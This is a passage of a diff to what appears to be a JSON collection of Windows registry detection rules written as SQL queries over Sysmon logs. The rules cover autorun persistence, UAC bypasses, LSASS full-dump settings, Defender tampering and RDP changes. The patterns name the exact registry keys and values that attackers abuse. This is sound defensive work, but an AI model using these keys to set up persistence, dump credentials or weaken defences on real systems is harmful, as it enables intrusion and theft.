'%\\\\Dropbox\\\\Client\\\\Dropbox.exe%' ESCAPE '\\' AND Details LIKE '% /systemstartup%' ESCAPE '\\') OR (TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects\\\\{92EF2EAD-A7CE-4424-B0DB-499CF856608E}\\\\NoExplorer' ESCAPE '\\') OR (Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{e2d1ae32-dd1d-4ad7-a298-10e42e7840fc}' ESCAPE '\\' OR TargetObject LIKE '%\\\\WOW6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\RunOnce\\\\{7037b699-7382-448c-89a7-4765961d2537}' 
ESCAPE '\\') AND Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\%' ESCAPE '\\' AND Details LIKE '%.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Details LIKE '\"C:\\\\ProgramData\\\\Package Cache\\\\{d21a4f20-968a-4b0c-bf04-a38da5f06e41}\\\\windowsdesktop-runtime-%' ESCAPE '\\') OR (Image LIKE '%\\\\VC\\_redist.x64.exe' ESCAPE '\\' AND Details LIKE '%}\\\\VC\\_redist.x64.exe\" /burn.runonce' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Package Cache%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\winsdksetup.exe%' ESCAPE '\\' OR Image LIKE '%\\\\windowsdesktop-runtime-%' ESCAPE '\\' OR Image LIKE '%\\\\AspNetCoreSharedFrameworkBundle-%' ESCAPE '\\') AND Details LIKE '% /burn.runonce' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Explorer\\\\Browser Helper Objects%' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Wow6432Node\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\AppInstaller\\\\EnableLocalManifestFiles' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "registry_set_asep_reg_keys_modification_wow6432node.yml" + "filename": "registry_set_winget_enable_local_manifest.yml" }, { - "title": "Outlook Security Settings Updated - Registry", - "id": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "title": "Changing RDP Port to Non Standard Number", + "id": "509e84b9-a71a-40e0-834f-05470369bd1e", "status": "test", - "description": 
"Detects changes to the registry values related to outlook security settings", + "description": "Remote desktop is a common feature in operating systems.\nIt allows a user to log into an interactive session with a system desktop graphical user interface on a remote system.\nMicrosoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).\n", "author": "frack113", "tags": [ "attack.persistence", - "attack.t1137" + "attack.t1547.010" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Outlook\\\\Security\\\\%' ESCAPE '\\' AND EventType = 'SetValue')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\PortNumber' ESCAPE '\\') AND NOT (Details = 'DWORD (0x00000d3d)'))" ], - "filename": "registry_set_office_outlook_security_settings.yml" + "filename": "registry_set_change_rdp_port.yml" }, { - "title": "Bypass UAC Using Event Viewer", - "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", + "title": "Lsass Full Dump Request Via DumpType Registry Settings", + "id": "33efc23c-6ea2-4503-8cfe-bdf82ce8f719", "status": "experimental", - "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", - "author": "frack113", + "description": "Detects the setting of the \"DumpType\" registry value to \"2\" which stands for a \"Full Dump\". 
Technique such as LSASS Shtinkering requires this value to be \"2\" in order to dump LSASS.", + "author": "@pbssubhash", "tags": [ - "attack.persistence", - "attack.t1547.010" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Legitimate application that needs to do a full dump of their process" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\DumpType%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\LocalDumps\\\\lsass.exe\\\\DumpType%' ESCAPE '\\') AND Details = 'DWORD (0x00000002)')" ], - "filename": "registry_set_bypass_uac_using_eventviewer.yml" + "filename": "registry_set_lsass_usermode_dumping.yml" }, { - "title": "Potential Persistence Via Outlook Home Page", - "id": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "title": "Classes Autorun Keys Modification", + "id": "9df5f547-c86a-433e-b533-f2794357e242", "status": "experimental", - "description": "Detects potential persistence activity via outlook home pages.", - "author": "Tobias Michalski (Nextron Systems)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ "attack.persistence", - "attack.t1112" + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during 
installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\WebView\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\URL' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Calendar\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Inbox\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Classes%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\ExtShellFolderViews%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Folder\\\\Shellex\\\\ColumnHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Filter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Exefile\\\\Shell\\\\Open\\\\Command\\\\(Default)%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Directory\\\\Shellex\\\\CopyHookHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AC757296-3522-4E11-9862-C17BE5A1767E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{ABE3B9A4-257D-4B97-BD1A-294AF496222E}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7ED96837-96F0-4812-B211-F13C24117ED3}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{083863F1-70DE-11d0-BD40-00A0C911CE86}\\\\Instance%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Classes\\\\AllFileSystemObjects\\\\ShellEx\\\\DragDropHandlers%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.exe%' ESCAPE '\\' OR TargetObject LIKE '%\\\\.cmd%' ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\PropertySheetHandlers%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\ShellEx\\\\ContextMenuHandlers%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR (Details = '{807583E5-5146-11D5-A672-00B0D022E945}') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\drvinst.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\lnkfile\\\\shellex\\\\ContextMenuHandlers\\\\%' ESCAPE '\\')))" ], - "filename": "registry_set_persistence_outlook_homepage.yml" + "filename": "registry_set_asep_reg_keys_modification_classes.yml" }, { - "title": "Modify User Shell Folders Startup Value", - "id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", + "title": "Disable PUA Protection on Windows Defender", + "id": "8ffc5407-52e3-478f-9596-0a7371eafe13", "status": "experimental", - "description": "Detect modification of the startup key to a path where a payload could be stored to be launched during startup", - "author": "frack113", + "description": "Detects disabling Windows Defender PUA protection", + "author": "Austin Songer @austinsonger", "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders%' ESCAPE '\\' AND TargetObject LIKE '%Startup' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\PUAProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "registry_set_susp_user_shell_folders.yml" + "filename": "registry_set_disabled_pua_protection_on_microsoft_defender.yml" }, { - "title": "RDP Sensitive Settings Changed", - "id": 
"3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "title": "Potential Registry Persistence Attempt Via Windows Telemetry", + "id": "73a883d0-0348-4be4-a8d8-51031c2564f8", "status": "test", - "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", - "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", + "description": "Detects potential persistence behaviour using the windows telemetry registry key.\nWindows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections.\nThis binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run.\nThe problem is, it will run any arbitrary command without restriction of location or type.\n", + "author": "Lednyov Alexey, oscd.community, Sreeman", "tags": [ - "attack.defense_evasion", "attack.persistence", - "attack.t1112" + "attack.t1053.005" ], "falsepositives": [ - "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' 
ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AppCompatFlags\\\\TelemetryController\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Command' ESCAPE '\\' AND (Details LIKE '%.sh%' ESCAPE '\\' OR Details LIKE '%.exe%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.bin%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.cmd%' ESCAPE '\\' OR Details LIKE '%.js%' ESCAPE '\\' OR Details LIKE '%.ps%' ESCAPE '\\' OR Details LIKE '%.vb%' ESCAPE '\\' OR Details LIKE '%.jar%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.msi%' ESCAPE '\\' OR Details LIKE '%.vbs%' ESCAPE '\\')) AND NOT ((Details LIKE '%\\\\system32\\\\CompatTelRunner.exe%' ESCAPE '\\' OR Details LIKE '%\\\\system32\\\\DeviceCensus.exe%' ESCAPE '\\')))" ], - "filename": "registry_set_terminal_server_tampering.yml" + "filename": "registry_set_telemetry_persistence.yml" }, { - "title": "Potential Persistence Via COM Search Order Hijacking", - "id": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "status": "experimental", - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric 
Hien", + "title": "Bypass UAC Using SilentCleanup Task", + "id": "724ea201-6514-4f38-9739-e5973c34f49a", + "status": "test", + "description": "There is an auto-elevated task called SilentCleanup located in %windir%\\system32\\cleanmgr.exe This can be abused to elevate any file with Administrator privileges without prompting UAC", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1546.015" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKCR\\\\CLSID\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKCU\\\\Software\\\\Classes\\\\CLSID\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\InprocServer32\\\\(Default)' ESCAPE '\\') AND NOT (((Details LIKE '%\\%\\%systemroot\\%\\%\\\\system32\\\\%' ESCAPE '\\' OR Details LIKE '%\\%\\%systemroot\\%\\%\\\\SysWow64\\\\%' ESCAPE '\\')) OR ((Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\FileCoAuthLib64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncShell64.dll%' ESCAPE '\\' OR Details LIKE '%\\\\FileSyncApi64.dll%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\TeamsMeetingAddin\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\Microsoft.Teams.AddinLoader.dll%' ESCAPE '\\') OR (Details LIKE '%\\\\AppData\\\\Roaming\\\\Dropbox\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\DropboxExt64.%.dll%' ESCAPE '\\') OR (Details LIKE '%TmopIEPlg.dll' ESCAPE '\\') OR ((Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\wuauclt.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\')) OR ((Image LIKE 
'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Details LIKE '%\\\\FileRepository\\\\nvmdi.inf%' ESCAPE '\\') OR (Image LIKE '%\\\\MicrosoftEdgeUpdateComRegisterShell64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\SYSTEM32\\\\dxdiag.exe' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Windows\\\\pyshellext.amd64.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\pyshellext.dll' ESCAPE '\\')) OR ((Details LIKE 'C:\\\\Windows\\\\system32\\\\dnssdX.dll' ESCAPE '\\' OR Details LIKE 'C:\\\\Windows\\\\SysWOW64\\\\dnssdX.dll' ESCAPE '\\')) OR (Details LIKE 'C:\\\\Windows\\\\system32\\\\spool\\\\drivers\\\\x64\\\\3\\\\PrintConfig.dll' ESCAPE '\\') OR ((Details LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Details LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\%' ESCAPE '\\') OR (Details LIKE '%C:\\\\WINDOWS\\\\system32\\\\GamingServicesProxy.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\Autopilot.dll%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\SecurityHealthService.exe' ESCAPE '\\' AND Details LIKE '%C:\\\\Windows\\\\System32\\\\SecurityHealth%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\poqexec.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe' ESCAPE '\\') AND TargetObject LIKE '%\\\\InProcServer32\\\\(Default)' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Environment\\\\windir' ESCAPE '\\' AND Details LIKE '%&REM%' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "registry_set_persistence_search_order.yml" + "filename": "registry_set_bypass_uac_using_silentcleanup_task.yml" }, { - "title": "Potential Persistence 
Via Custom Protocol Handler", - "id": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "title": "Add Debugger Entry To AeDebug For Persistence", + "id": "092af964-4233-4373-b4ba-d86ea2890288", "status": "experimental", - "description": "Detects potential persistence activity via the registering of a new custom protocole handlers. While legitimate applications register protocole handlers often times during installation. And attacker can abuse this by setting a custom handler to be used as a persistence mechanism.", + "description": "Detects when an attacker adds a new \"Debugger\" value to the \"AeDebug\" key in order to achieve persistence which will get invoked when an application crashes", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.persistence" ], "falsepositives": [ - "Legitimate applications registering a new custom protocol handler" + "Legitimate use of the key to setup a debugger. Which is often the case on developers machines" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetObject LIKE 'HKCR\\\\%' ESCAPE '\\' AND Details LIKE 'URL:%' ESCAPE '\\') AND NOT ((Details LIKE 'URL:ms-%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\AeDebug\\\\Debugger%' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\') AND NOT (Details LIKE '\"C:\\\\WINDOWS\\\\system32\\\\vsjitdebugger.exe\" -p \\%ld -e \\%ld -j 0x\\%p' ESCAPE '\\'))" ], - "filename": "registry_set_persistence_custom_protocol_handler.yml" + "filename": "registry_set_aedebug_persistence.yml" }, { - "title": "Potential 
PowerShell Execution Policy Tampering", - "id": "fad91067-08c5-4d1a-8d8c-d96a21b37814", + "title": "Bypass UAC Using Event Viewer", + "id": "674202d0-b22a-4af4-ae5f-2eda1f3da1af", "status": "experimental", - "description": "Detects changes to the PowerShell execution policy in order to bypass signing requirements for script execution", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification", + "author": "frack113", "tags": [ - "attack.defense_evasion" + "attack.persistence", + "attack.t1547.010" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy' ESCAPE '\\' OR TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy' ESCAPE '\\') AND (Details LIKE '%Bypass%' ESCAPE '\\' OR Details LIKE '%RemoteSigned%' ESCAPE '\\' OR Details LIKE '%Unrestricted%' ESCAPE '\\')) AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\_Classes\\\\mscfile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%SystemRoot\\%\\\\system32\\\\mmc.exe \"\\%1\" \\%%' ESCAPE '\\'))" ], - "filename": "registry_set_powershell_execution_policy.yml" + "filename": "registry_set_bypass_uac_using_eventviewer.yml" }, { - "title": "Potential Persistence Via LSA Extensions", - "id": "41f6531d-af6e-4c6e-918f-b946f2b85a36", - "status": "experimental", - "description": "Detects when an attacker modifies the \"REG_MULTI_SZ\" value named \"Extensions\" to include a custom DLL 
to achieve persistence via lsass.\nThe \"Extensions\" list contains filenames of DLLs being automatically loaded by lsass.exe. Each DLL has its InitializeLsaExtension() method called after loading.\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "System Scripts Autorun Keys Modification", + "id": "e7a2fd40-3ae1-4a85-bf80-15cf624fb1b1", + "status": "test", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.persistence" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\LsaExtensionConfig\\\\LsaSrv\\\\Extensions%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Policies\\\\Microsoft\\\\Windows\\\\System\\\\Scripts%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Startup%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Shutdown%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logon%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Logoff%' ESCAPE '\\')) AND NOT (Details = '(Empty)'))" ], - "filename": "registry_set_persistence_lsa_extension.yml" + "filename": "registry_set_asep_reg_keys_modification_system_scripts.yml" }, { - "title": "Scheduled TaskCache Change by Uncommon Program", - "id": "4720b7df-40c3-48fd-bbdf-fd4b3c464f0d", + "title": "VBScript Payload Stored in Registry", + "id": 
"46490193-1b22-4c29-bdd6-5bf63907216f", "status": "experimental", - "description": "Monitor the creation of a new key under 'TaskCache' when a new scheduled task is registered by a process that is not svchost.exe, which is suspicious", - "author": "Syed Hasan (@syedhasan009)", + "description": "Detects VBScript content stored into registry keys as seen being used by UNC2452 group", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1547.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\%' ESCAPE '\\') AND NOT (((TargetObject LIKE '%Microsoft\\\\Windows\\\\UpdateOrchestrator%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\SoftwareProtectionPlatform\\\\SvcRestartTask\\\\Index%' ESCAPE '\\' OR TargetObject LIKE '%Microsoft\\\\Windows\\\\Flighting\\\\OneSettings\\\\RefreshCache\\\\Index%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND Image LIKE '%\\\\ngen.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\{B66B135D-DA06-4FC4-95F8-7458E1D10129}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\.NET Framework\\\\.NET Framework NGEN%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Integration\\\\Integrator.exe' ESCAPE 
'\\')) OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Dropbox\\\\Update\\\\DropboxUpdate.exe' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tree\\\\Microsoft\\\\Windows\\\\PLA\\\\Server Manager Performance Monitor\\\\%' ESCAPE '\\') OR (Image = 'System')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (Details LIKE '%vbscript:%' ESCAPE '\\' OR Details LIKE '%jscript:%' ESCAPE '\\' OR Details 